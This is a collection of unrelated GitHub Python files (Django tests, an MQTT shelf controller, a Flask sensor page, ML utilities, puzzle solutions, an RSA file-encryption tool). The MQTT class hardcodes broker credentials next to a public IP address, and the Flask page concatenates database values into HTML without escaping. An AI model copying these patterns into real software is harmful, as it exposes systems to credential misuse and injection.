self.writeFileToDisk()\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/InsertIefaLeadArrayIntoIefaLeadsDB.py","file_name":"InsertIefaLeadArrayIntoIefaLeadsDB.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23753558830","text":"from decimal import Decimal\nimport os\nfrom unittest.mock import patch\nfrom hashlib import sha512\n\nimport pytest\n\nfrom model_bakery import baker\n\nfrom booking.models import Membership, Booking, GiftVoucher\nfrom ..models import Invoice, Seller, StripePaymentIntent, StripeRefund\n\npytestmark = pytest.mark.django_db\n\n\ndef test_invoice_str():\n invoice = baker.make(Invoice, username=\"test@test.com\", invoice_id=\"foo123\", amount=\"10\")\n assert str(invoice) == \"foo123 - test@test.com - £10\"\n assert invoice.date_paid is None\n invoice.paid = True\n invoice.save()\n assert str(invoice) == \"foo123 - test@test.com - £10 (paid)\"\n assert invoice.date_paid is not None\n\n\n@patch(\"stripe_payments.models.ShortUUID.random\")\ndef test_generate_invoice_id(short_uuid_random):\n short_uuid_random.side_effect = [\"foo123\", \"foo234\", \"foo567\"]\n # inv id generated from random shortuuid\n assert Invoice.generate_invoice_id() == \"foo123\"\n\n # if an invoice already exists with that id, try again until we get a unique one\n baker.make(Invoice, invoice_id=\"foo234\")\n assert Invoice.generate_invoice_id() == \"foo567\"\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_signature():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n assert invoice.signature() == sha512(\"foo123test\".encode(\"utf-8\")).hexdigest()\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_item_count():\n invoice = baker.make(\n Invoice, invoice_id=\"foo123\",\n memberships=baker.make(Membership, _quantity=2),\n bookings=baker.make(Booking, _quantity=1),\n gift_vouchers=baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, _quantity=1),\n )\n assert invoice.item_count() == 4\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_items_metadata():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n membership = baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n booking = baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n gift_voucher = baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, invoice=invoice)\n \n assert invoice.items_metadata() == {\n f'booking_{booking.id}_cost_in_p': '1000',\n f'booking_{booking.id}_item': str(booking.event),\n f'gift_voucher_{gift_voucher.id}_cost_in_p': '1000',\n f'gift_voucher_{gift_voucher.id}_item': 'Gift Voucher: £10.00',\n f'membership_{membership.id}_cost_in_p': '1000',\n f'membership_{membership.id}_item': f'test membership - {membership.month_str} {membership.year}'}\n\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_items_summary():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n membership = baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n booking = baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n gift_voucher = baker.make(\n GiftVoucher, gift_voucher_type__event_type=\"private\", \n gift_voucher_type__override_cost=Decimal(10), invoice=invoice\n )\n\n assert invoice.items_summary() == {\n \"bookings\": [str(booking.event)],\n \"memberships\": [str(membership)],\n \"gift_vouchers\": [str(gift_voucher)]\n }\n\n\n@pytest.mark.usefixtures(\"invoice_keyenv\")\ndef test_invoice_item_types():\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n baker.make(Membership, membership_type__cost=10, membership_type__name=\"test membership\", invoice=invoice)\n baker.make(Booking, event__name=\"test event\", event__cost=10, invoice=invoice)\n baker.make(GiftVoucher, gift_voucher_type__discount_amount=10, invoice=invoice)\n\n assert invoice.item_types() == [\"memberships\", \"bookings\", \"gift_vouchers\"]\n\n\ndef test_seller_str():\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n assert str(seller) == \"testuser@test.com\"\n\n\ndef test_create_stripe_payment_intent_instance_from_pi(get_mock_payment_intent):\n payment_intent = get_mock_payment_intent()\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n assert not StripePaymentIntent.objects.exists()\n pi, created = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice)\n assert created\n assert StripePaymentIntent.objects.count() == 1\n assert pi.invoice == invoice\n assert pi.seller is None\n\n # update with seller\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n pi, created = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice, seller=seller)\n assert not created\n assert StripePaymentIntent.objects.count() == 1\n assert pi.seller == seller\n\n\ndef test_stripe_payment_intent_str(get_mock_payment_intent):\n payment_intent = get_mock_payment_intent()\n invoice = baker.make(Invoice, invoice_id=\"foo123\", username=\"user@test.com\")\n pi, _ = StripePaymentIntent.update_or_create_payment_intent_instance(payment_intent, invoice)\n assert str(pi) == \"mock-intent-id - invoice foo123 - user@test.com\"\n\n\ndef test_create_stripe_refund_instance_from_refund_obj_and_pi_instance(get_mock_payment_intent, get_mock_refund):\n payment_intent_from_stripe = get_mock_payment_intent()\n refund_from_stripe = get_mock_refund()\n invoice = baker.make(Invoice, invoice_id=\"foo123\")\n seller = baker.make(Seller, user__email=\"testuser@test.com\")\n pi, _ = StripePaymentIntent.update_or_create_payment_intent_instance(\n payment_intent_from_stripe, invoice, seller=seller\n )\n \n refund = StripeRefund.create_from_refund_obj(\n refund=refund_from_stripe, payment_intent_model_instance=pi, booking_id=1\n )\n assert refund.booking_id == 1\n assert refund.refund_id == \"mock-refund-id\"\n assert refund.amount == 800\n assert refund.invoice == invoice\n assert refund.seller == seller\n","repo_name":"rebkwok/sunshine","sub_path":"stripe_payments/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29776796907","text":"\"\"\"BOOKAPP URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import create_book,list_all_book,delete_book,update_book,Registration,login_todo,django_logout\n\nurlpatterns = [\n path(\"create\",create_book,name=\"create\"),\n path(\"list\",list_all_book,name=\"listbook\"),\n path(\"delete/\",delete_book,name=\"delete\"),\n path(\"edit/\",update_book,name=\"update\"),\n path(\"registeration\",Registration,name=\"register\"),\n path(\"login\",login_todo,name=\"loginview\"),\n path(\"logout\",django_logout,name=\"logoutview\"),\n\n\n]\n","repo_name":"bibinbm98/bookapp-django","sub_path":"book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33223727854","text":"import paho.mqtt.client as mqtt\nimport sys\nimport time\nimport smbus2\nfrom RPLCD.i2c import CharLCD\n\nsys.modules['smbus'] = smbus2\n\nuser = 'iot2020'\npassword = '123456'\n\nhost = \"35.233.225.236\"\nid_dict = {'orange' : 'Xlwra2HLExjGArkgxtcl', 'apple' : 'ioTrUrnFNWR6pO0pJtIq'}\n\nclass mqtt_class(object):\n\n lock = True\n price = 0\n client = mqtt.Client()\n lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n\n def __init__(self, name):\n\n self.name = name\n self.ID = id_dict[self.name]\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n self.client.username_pw_set(user, password)\n self.client.connect(host, 1883, 120)\n self.client.loop_start()\n\n def on_connect(self, client, userdata, flags, rc):\n print(\"Client connected with result code: {}\".format(str(rc)))\n self.client.subscribe([(self.ID + '/open', 2), (self.ID + '/price', 2)])\n\n def on_message(self, client, userdata, msg):\n # Enable lid or Set price\n if int(msg.payload) == 1:\n self.lock = False\n else:\n self.price = int(msg.payload)\n print('[ACT] Price is :' + str(self.price))\n self.lcd.clear()\n self.lcd.cursor_pos = (0, 0)\n self.lcd.write_string('Item: ' + self.name)\n self.lcd.cursor_pos = (1, 0)\n self.lcd.write_string('Price: ' + str(self.price))\n\n def take_goods(self):\n self.client.publish(self.ID + \"/take\", \"fuck\", qos=2, retain=False)\n print('[ACT] Goods taken')\n\n def close_lid(self):\n self.client.publish(self.ID + \"/close\", \"1\", qos=2, retain=False)\n print('[Act] Close lid')\n \n def shut_down(self): \n self.lcd.clear()\n self.client.disconnect()\n\n","repo_name":"DaDa0413/IoT-Shelf","sub_path":"utils/mqtt_lib.py","file_name":"mqtt_lib.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35056306579","text":"from typing import Dict, Tuple, Union\n\nimport numpy as np\nimport torch as th\n\nimport yadrl.common.types as t\nfrom yadrl.common.ops import to_numpy, to_tensor\nfrom yadrl.common.running_mean_std import RunningMeanStd\n\n\nclass DummyNormalizer:\n def __init__(self, **kwargs):\n pass\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n return batch_input\n\n def update(self, batch_input):\n pass\n\n def load(self, state_dict: Dict[str, Union[np.ndarray, int]]):\n pass\n\n def state_dict(self) -> Dict[str, Union[np.ndarray, int]]:\n state_dict = {}\n return state_dict\n\n\nclass RMSNormalizer(DummyNormalizer):\n def __init__(\n self,\n dim: Tuple[int, ...],\n clip_min: float = -5.0,\n clip_max: float = 5.0,\n **kwargs\n ):\n super().__init__(**kwargs)\n self._rms = RunningMeanStd(dim)\n self._clip = (clip_min, clip_max)\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n mean, std = self._rms()\n if isinstance(batch_input, th.Tensor):\n th_mean = to_tensor(mean, device)\n th_std = to_tensor(std, device)\n return th.clamp((batch_input - th_mean) / th_std, *self._clip)\n return np.clip(batch_input - mean / std, *self._clip)\n\n def update(self, batch_input: t.TData):\n if isinstance(batch_input, th.Tensor):\n self._rms.update(to_numpy(batch_input))\n else:\n self._rms.update(batch_input)\n\n def load(self, state_dict: Dict[str, Union[np.ndarray, int]]):\n mean = state_dict[\"mean\"]\n variance = state_dict[\"variance\"]\n count = state_dict[\"count\"]\n self._rms.set_parameters(mean, variance, count)\n\n def state_dict(self) -> Dict[str, Union[np.ndarray, int]]:\n state_dict = {\n \"mean\": self._rms.mean,\n \"variance\": self._rms.variance,\n \"count\": self._rms.count,\n }\n return state_dict\n\n\nclass ScaleNormalizer(DummyNormalizer):\n def __init__(\n self,\n target_min: np.ndarray,\n target_max: np.ndarray,\n source_min: np.ndarray,\n source_max: np.ndarray,\n **kwargs\n ):\n super().__init__(**kwargs)\n self._t_min = target_min\n self._t_max = target_max\n self._s_min = source_min\n self._s_max = source_max\n\n def __call__(\n self,\n batch_input: Union[np.ndarray, th.Tensor],\n device: th.device = th.device(\"cpu\"),\n ) -> t.TData:\n t_min = self._t_min\n t_max = self._t_max\n s_min = self._s_min\n s_max = self._s_max\n if isinstance(batch_input, th.Tensor):\n t_min = to_tensor(t_min, device)\n t_max = to_tensor(t_max, device)\n s_min = to_tensor(s_min, device)\n s_max = to_tensor(s_max, device)\n return (batch_input - s_min) / (s_max - s_min) * (t_max - t_min) + t_min\n\n\nclass ImageNormalizer(DummyNormalizer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._scale_factor = 1.0 / 256.0\n\n def __call__(\n self, batch_input: t.TData, device: th.device = th.device(\"cpu\")\n ) -> t.TData:\n return batch_input * self._scale_factor\n","repo_name":"gbartyzel/yadrl","sub_path":"yadrl/common/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20437383214","text":"from util import *\n\n\n@click.group()\ndef cli():\n pass\n\n\ndef process_line(line):\n return list(map(int, line.split(\",\")))\n\n\ndef rfind(l, e):\n for i in range(len(l) - 1, -1, -1):\n if l[i] == e:\n return i\n raise ValueError(\"oops\")\n\n\n@cli.command()\n@click.argument(\"input\", type=click.File())\n@click.argument(\"pos\", type=int)\ndef part1(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n for i in range(len(data), pos):\n last = data[-1]\n try:\n b = rfind(data[:-1], last)\n data.append(i - b - 1)\n except:\n data.append(0)\n print(data[-1])\n\n\n@cli.command()\n@click.argument(\"input\", type=click.File())\n@click.argument(\"pos\", type=int)\ndef part2(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n prev_ind = {k: i for (i, k) in enumerate(data)}\n\n last = data[-1]\n last_ind = -1\n\n for i in range(len(data), pos):\n if last_ind < 0:\n last = 0\n else:\n last = i - last_ind - 1\n\n last_ind = prev_ind.get(last, -1)\n prev_ind[last] = i\n\n print(last)\n\n\n@cli.command()\n@click.argument(\"input\", type=click.File())\n@click.argument(\"pos\", type=int)\ndef part3(input, pos):\n data = [process_line(l) for l in read_file(input)][0]\n\n prev_ind = defaultdict(list)\n for i, k in enumerate(data):\n prev_ind[k].append(i)\n\n num = data[-1]\n for i in range(len(data), pos):\n indices = prev_ind[num]\n\n if len(indices) < 2:\n num = 0\n else:\n num = indices[-1] - indices[-2]\n\n prev_ind[num].append(i)\n\n print(num)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"astonm/advent-of-code-2020","sub_path":"day15/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36616035830","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom .forms import ContatoModelForm\nfrom .models import Contato\n\ndef index(request):\n if str(request.method) == 'POST':\n form = ContatoModelForm(request.POST, request.FILES)\n if form.is_valid():\n\n form.save()\n\n messages.success(request, 'Contato salvo com sucesso.')\n form = ContatoModelForm()\n else:\n messages.error(request, 'Erro ao salvar Contato.')\n else:\n form = ContatoModelForm()\n context = {\n 'form': form\n }\n return render(request, 'index.html', context)\n\ndef error404(request,Exception):\n template = loader.get_template('404.html')\n return HttpResponse(content=template.render(), content_type='text/html; charset=utf8', status=404)\n\n\ndef error500(request, Exception):\n template = loader.get_template('500.html')\n return HttpResponse(content=template.render(), content_type='text/html; charset=utf8', status=500)\n\ndef contato(request):\n if str(request.user) != 'AnonymousUser':\n if str(request.method) == 'POST':\n form = ContatoModelForm(request.POST, request.FILES)\n if form.is_valid():\n\n form.save()\n\n messages.success(request, 'Contato salvo com sucesso.')\n form = ContatoModelForm()\n else:\n messages.error(request, 'Erro ao salvar Contato.')\n else:\n form = ContatoModelForm()\n context = {\n 'form': form\n }\n return render(request, 'contato.html', context)\n else:\n return redirect('index')","repo_name":"jerickleandro/d3club","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24497674698","text":"#############\n# Libraries #\n#############\n\nfrom helpers import process_image, load_generator, show_results\nimport numpy as np\nimport argparse\nimport torch\ntorch.manual_seed(7)\nnp.random.seed(5)\n\nMODEL_PATH = '../model/GAN_checkpoint.pth'\nimg_size = 128\ng_conv_dims = 128\nn_res_blocks = 10\n\n# set parser parameters\nparser = argparse.ArgumentParser('This program allow you to convert human faces into cartoon ones and vise versa.')\nparser.add_argument('-i', '--image', type = str, default = 'None', help = 'Image name.')\nparser.add_argument('-c', '--convert', type = str, default = 'human', help = 'Indicates to which type of image to convert (human or cartoon). Default value is set to human.')\nparser.add_argument('-f', '--filenames', type = str, default = 'image', help = 'Save name used for the resulting images (comparison and new image). If ignored, the default files will be image_comparison.svg and image_result.svg')\narg = parser.parse_args()\n\n####################\n# Program Functions#\n####################\n\ndef run():\n if arg.image is not 'None':\n # process image\n image = process_image(arg.image)\n print('Converting ' + arg.image + ' image to ' + arg.convert)\n if arg.convert == 'cartoon':\n # load model\n G_XtoY = load_generator(g_conv_dims, n_res_blocks, 'G_XtoY')\n # set model to eval\n G_XtoY.eval()\n # apply model\n result = G_XtoY(image)\n # plot and save results\n show_results(image, result, arg.filenames)\n elif arg.convert == 'human':\n # load model\n G_YtoX = load_generator(g_conv_dims, n_res_blocks, 'G_YtoX')\n # set model to eval\n G_YtoX.eval()\n # apply model\n result = G_YtoX(image)\n # plot and save results\n show_results(image, result, arg.filenames)\n else:\n raise NotImplementedError('Unknow convert {} parameter. Valid options are: human, cartoon'.format(arg.convert))\n \nif __name__ == '__main__':\n run()\n","repo_name":"LsAntonio/cycle-gan","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26915172318","text":"from Player import Player\nclass PlayerList:\n def __init__(self):\n self.start=None\n self.end=None\n self.temp=None\n def add(self,Name,runs,Avg):\n player=Player(Name,runs,Avg)\n if(self.start==None and self.end==None):\n self.start=player\n self.end=player\n else:\n self.end.next=player\n self.end=player\n def Traversal(self):\n current=self.start\n print(\"Player|\\t\\tRuns|\\t\\tAvg|\")\n while current is not None:\n current.printplayers()\n current=current.next\n def search(self,str):\n current=self.start\n while current is not None:\n if current.Name==str:\n print(\"Player Found\")\n current.printplayers()\n break\n current=current.next\n if current is None:\n print(\"Player not found\")\n def delete(self,str):\n current=self.start\n if(current.Name==str):\n self.start=current.next\n else:\n while(current.next.next is not None):\n if(current.next.Name==str):\n current.next=current.next.next\n current=current.next\n if(current.next.Name==str):\n self.end=current\n self.end.next=None\n\n\n\n","repo_name":"KiranBKL/DSACompetitive","sub_path":"Linkedlist/LinkedlistPython/PlayerList.py","file_name":"PlayerList.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71716156872","text":"from typing import List\n\nfrom project.loans.base_loan import BaseLoan\nfrom project.loans.mortgage_loan import MortgageLoan\nfrom project.loans.student_loan import StudentLoan\n\nfrom project.clients.adult import Adult\nfrom project.clients.base_client import BaseClient\nfrom project.clients.student import Student\n\n\nclass BankApp:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.loans: List[BaseLoan] = []\n self.clients: List[BaseClient] = []\n\n def __object_grep(self, provided_id, class_name):\n # Assuming class_name is the actual class, not a string\n object_grep = next((obj for obj in getattr(self, class_name) if obj.client_id == provided_id), None)\n return object_grep\n\n def add_loan(self, loan_type: str):\n if loan_type != 'StudentLoan' and loan_type != 'MortgageLoan':\n raise Exception(\"Invalid loan type!\")\n # loan = eval(f\"{loan_type}()\")\n if loan_type == 'StudentLoan':\n loan = StudentLoan()\n else:\n loan = MortgageLoan()\n self.loans.append(loan)\n return f\"{loan_type} was successfully added.\"\n\n def add_client(self, client_type: str, client_name: str, client_id: str, income: float):\n if client_type not in ['Student', 'Adult']:\n raise Exception(\"Invalid client type!\")\n if len(self.clients) >= self.capacity:\n return \"Not enough bank capacity.\"\n if client_type == 'Student':\n client = Student(client_name, client_id, income)\n else:\n client = Adult(client_name, client_id, income)\n self.clients.append(client)\n return f\"{client_type} was successfully added.\"\n\n def grant_loan(self, loan_type: str, client_id: str):\n # find if client is student or adult and check if the loan type is correct\n # client_object = self.__object_grep(client_id, \"Student\")\n client_object = [c for c in self.clients if c.client_id == client_id][0]\n if (loan_type == 'StudentLoan' and client_object.__class__.__name__ == 'Student') or \\\n (loan_type == \"MortgageLoan\" and client_object.__class__.__name__ == 'Adult'):\n loan = [l for l in self.loans if l.__class__.__name__ == loan_type][0]\n self.loans.remove(loan)\n client_object.loans.append(loan)\n return f\"Successfully granted {loan_type} to {client_object.name} with ID {client_id}.\"\n else:\n raise Exception(\"Inappropriate loan type!\")\n\n def remove_client(self, client_id: str):\n try:\n client_object = [c for c in self.clients if c.client_id == client_id][0]\n except IndexError:\n raise Exception(\"No such client!\")\n if client_object.loans:\n raise Exception(\"The client has loans! Removal is impossible!\")\n self.clients.remove(client_object)\n return f\"Successfully removed {client_object.name} with ID {client_id}.\"\n\n def increase_loan_interest(self, loan_type: str):\n cnt = 0\n for loan in self.loans:\n if loan.__class__.__name__ == loan_type:\n loan.increase_interest_rate()\n cnt += 1\n return f\"Successfully changed {cnt} loans.\"\n\n def increase_clients_interest(self, min_rate: float):\n cnt = 0\n for client in self.clients:\n if client.interest < min_rate:\n client.increase_clients_interest()\n cnt += 1\n return f\"Number of clients affected: {cnt}.\"\n\n def get_statistics(self):\n total_clients_income = sum([c.income for c in self.clients])\n loans_count_granted_to_clients = sum([len(c.loans) for c in self.clients])\n granted_sum = sum([l.amount for c in self.clients for l in c.loans])\n not_granted_sum = sum([l.amount for l in self.loans])\n\n try:\n avg_client_interest_rate = sum([c.interest for c in self.clients]) / len(self.clients)\n except ZeroDivisionError:\n avg_client_interest_rate = 0\n\n result = f\"Active Clients: {len(self.clients)}\\n\"\n result += f\"Total Income: {total_clients_income:.2f}\\n\"\n result += f\"Granted Loans: {loans_count_granted_to_clients}, Total Sum: {granted_sum:.2f}\\n\"\n result += f\"Available Loans: {len(self.loans)}, Total Sum: {not_granted_sum:.2f}\\n\"\n result += f\"Average Client Interest Rate: {avg_client_interest_rate:.2f}\"\n\n return result\n","repo_name":"tsvtln/SoftUniOOP","sub_path":"OOP_exam_5august2023/project/bank_app.py","file_name":"bank_app.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31480099440","text":"import connexion\n\nimport sqlite3\n\n\n\napp = connexion.App(__name__, specification_dir='./')\napp.add_api('cloud.yml')\n\n\n\n@app.route('/')\ndef index():\n\t\n\tconn = sqlite3.connect('dht.db')\n\tc = conn.cursor()\n\tc.execute('SELECT id, devicename, reading_time, temperature, humidity, moved, label FROM readings ORDER BY devicename ASC, reading_time DESC')\n\tresults = c.fetchall()\n\n\thtmlTableRows = ''\n\n\tfor result in results:\n\t\t\n\t\thtmlTableRows += '' + str(result[0]) + '' + str(result[1]) + '' + str(result[2]) + '' + str(result[3]) + '' + str(result[4]) + '' + str(result[5]) + '' + str(result[6]) + ''\n \n\thtml = 'Cloud Server' \n\thtml += '

Global Historical Sensor Data

' + htmlTableRows + '
IDDevice NameTimestampTemperatureHumidityMoving PeopleModel
'\n\n\tc.close()\n\tconn.close()\n\n\treturn html\n\n\n\n# If we're running in stand alone mode, run the application\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"nanfang-wuyu/web-app-NUS","sub_path":"Real-Time Prediction/Cloud/aiot-cloud.py","file_name":"aiot-cloud.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4963967911","text":"from database.connection import DBConnection\nfrom crypto.rsa import RSA\nfrom pathlib import Path\nfrom utilities.fileutils import reconstruct_file_content\nimport uuid\nimport os\n\n\ndef add(file_path, enc_location):\n \"\"\"\n :param file_path:\n The path of the file we wish to encrypt.\n :param enc_location:\n The location where we will save the encryption\n :return:\n True, if successful. (if not successful it will raise a ValueError)\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be added to the database\")\n\n name = Path(file_path).name\n n, e, d = RSA.generate_rsa_keypair()\n fs, chunk_size, enc = RSA.encrypt_file(file_path, n, e)\n uid = str(uuid.uuid4())\n full_name = uid + \"_\" + name\n\n save_location = enc_location + r\"\\\\\" + full_name\n print(\"SAVING AT: \" + save_location)\n with open(save_location, 'w') as f:\n to_write = \"\"\n for num in enc:\n to_write += str(num)\n to_write += \" \"\n\n f.write(to_write)\n f.close()\n\n conn = DBConnection()\n file_object = {\n \"uid\": uid,\n \"name\": name,\n \"n\": str(n),\n \"e\": str(e),\n \"d\": str(d),\n \"file_size\": str(fs),\n \"chunk_size\": str(chunk_size)\n }\n conn.add_one_file(file_object)\n return True\n\n\ndef delete(file_path):\n \"\"\"\n :param file_path:\n The path of the encrypted file that we want to delete from the database.\n :return:\n True, if successful, else False.\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be deleted from the database\")\n\n name = Path(file_path).name\n split_name = name.split(\"_\")\n if len(split_name) != 2:\n raise ValueError(\"The input file must have a name of type: uid_filename\")\n\n uid, file_name = split_name\n conn = DBConnection()\n files_found = conn.get_file_by_id(uid)\n\n if len(files_found) == 0:\n print(\"[Delete]No files found...\")\n return False\n elif len(files_found) > 1:\n print(\"[Delete]Too many matches for uid\")\n return False\n\n file_obj = files_found[0]\n deleted = conn.delete_one_file(file_obj[\"uid\"])\n if deleted == 0:\n print(\"[Delete]Found nothing to delete\")\n return False\n elif deleted > 1:\n print(\"[Delete]Warning! More than one record deleted!\")\n\n os.remove(file_path)\n return True\n\n\ndef read(file_path, dec_location):\n \"\"\"\n :param file_path:\n The path to the encrypted file we want to read.\n :param dec_location:\n The location where the decryption will be stored\n :return:\n True if successful, else False.\n \"\"\"\n if not os.path.isfile(file_path):\n raise ValueError(\"Only files can be read from the database\")\n\n name = Path(file_path).name\n split_name = name.split(\"_\")\n if len(split_name) != 2:\n raise ValueError(\"The input file must have a name of type: uid_filename\")\n uid, file_name = split_name\n conn = DBConnection()\n files_found = conn.get_file_by_id(uid)\n\n if len(files_found) == 0:\n print(\"[Read]No files found...\")\n return False\n elif len(files_found) > 1:\n print(\"[Read]Too many matches for uid\")\n return False\n\n file_obj = files_found[0]\n n = int(file_obj[\"n\"])\n d = int(file_obj[\"d\"])\n file_size = int(file_obj[\"file_size\"])\n chunk_size = int(file_obj[\"chunk_size\"])\n\n with open(file_path, 'r') as f:\n content = f.read()\n content = content.split(\" \")\n content.pop()\n content = [int(i) for i in content]\n f.close()\n\n decryption = RSA.decrypt_file_content(content, n, d)\n file_content = reconstruct_file_content(file_size, chunk_size, decryption)\n save_location = dec_location + r\"\\\\\" + file_name\n print(\"READING INTO: \" + save_location)\n with open(save_location, 'wb') as f:\n f.write(file_content)\n f.close()\n\n return True\n","repo_name":"robbyyt/EncryptedDatabase","sub_path":"functionalities/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22571045585","text":"# Downloading, Unzipping and Extracting the \" LibriSpeech Dataset \"\r\n# URL : 'https://www.openslr.org/12/'\r\n\r\nimport requests\r\nimport tarfile\r\nimport os\r\nfrom tqdm import tqdm\r\n\r\n# Define the URLs of the files\r\nurls = [\r\n 'https://www.openslr.org/resources/12/train-clean-100.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-clean-360.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-other-500.tar.gz',\r\n 'https://www.openslr.org/resources/12/test-clean.tar.gz',\r\n 'https://www.openslr.org/resources/12/train-other.tar.gz'\r\n]\r\n\r\n# Define the desired filenames\r\ndesired_files = [\r\n 'train-clean-100.tar.gz',\r\n 'train-clean-360.tar.gz',\r\n 'train-other-500.tar.gz',\r\n 'test-clean.tar.gz',\r\n 'train-other.tar.gz'\r\n]\r\n\r\n# Create a directory to store the downloaded files\r\ndownload_dir = 'data'\r\nos.makedirs(download_dir, exist_ok=True)\r\n\r\n# Iterate over the URLs and desired filenames\r\nfor url, filename in zip(urls, desired_files):\r\n print(f'Downloading {filename}...')\r\n \r\n # Download the file\r\n response = requests.get(url, stream=True)\r\n total_size = int(response.headers.get('content-length', 0))\r\n block_size = 1024\r\n progress_bar = tqdm(total=total_size, unit='iB', unit_scale=True)\r\n \r\n with open(os.path.join(download_dir, filename), 'wb') as f:\r\n for data in response.iter_content(block_size):\r\n progress_bar.update(len(data))\r\n f.write(data)\r\n progress_bar.close()\r\n \r\n print(f'{filename} downloaded.')\r\n\r\n print(f'Extracting {filename}...')\r\n \r\n # Extract the file\r\n with tarfile.open(os.path.join(download_dir, filename), 'r:gz') as tar:\r\n total_members = len(tar.getmembers())\r\n progress_bar = tqdm(tar.getmembers(), total=total_members)\r\n\r\n for member in progress_bar:\r\n progress_bar.set_description(f\"Extracting {member.name}\")\r\n tar.extract(member, path='./LibriSpeech')\r\n\r\n progress_bar.close()\r\n \r\n print(f'{filename} extracted.')\r\n\r\nprint('All files downloaded and extracted successfully.')\r\n\r\n","repo_name":"nandy-candy101/Speech-Processing","sub_path":"LibriSpeech_download.py","file_name":"LibriSpeech_download.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15997401125","text":"import torch\nfrom c2far.ml.evaluators.evaluator import Evaluator\n\n\nclass GenerationEvaluator(Evaluator):\n \"\"\"Class to help with testing of multi-step-ahead generation.\"\"\"\n LABEL = \"GenerationEvaluator\"\n\n def __init__(self, batch_pred, device):\n \"\"\"Pass in the batch predictor and the device (torch.device, not the\n string).\n\n Arguments:\n\n batch_pred: BatchPredictor, which we call to generate\n predictions.\n\n device: torch.device (not the string), onto which we place the\n tensors.\n\n \"\"\"\n super().__init__(device)\n self.batch_pred = batch_pred\n\n def 